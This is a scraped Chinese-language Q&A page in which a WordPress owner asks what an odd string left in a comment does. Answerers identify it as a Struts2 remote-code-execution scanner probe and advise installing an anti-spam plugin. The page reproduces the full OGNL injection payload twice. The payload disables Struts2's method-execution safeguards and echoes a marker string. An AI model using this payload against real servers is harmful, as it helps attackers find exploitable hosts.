Maison > développement back-end > tutoriel php > javascript - 有人在wordpress评论里写这个,这段代码是干什么用的?

javascript - 有人在wordpress评论里写这个,这段代码是干什么用的?

WBOY
Libérer: 2016-09-29 09:33:02
original
1161 Les gens l'ont consulté

‘+(#context[”xwork.MethodAccessor.denyMethodExecution”]=new java.lang.Boolean(false),#_memberAccess[”allowStaticMethodAccess”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’

回复内容:

‘+(#context[”xwork.MethodAccessor.denyMethodExecution”]=new java.lang.Boolean(false),#_memberAccess[”allowStaticMethodAccess”]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str=’814F60BD-F6DF-4227-‘,#b_str=’86F5-8D9FBF26A2EB’,#a_resp=@org.apache.struts2.ServletActionContext@getResponse(),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+’

印象中有这么一个java的struts2框架远程执行任意代码的漏洞

一般这种都是扫漏洞的脚本所为,如果不是用的只是wordpress,那你装一个防止垃圾评论的插件即可,不影响

Étiquettes associées:
source:php.cn
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal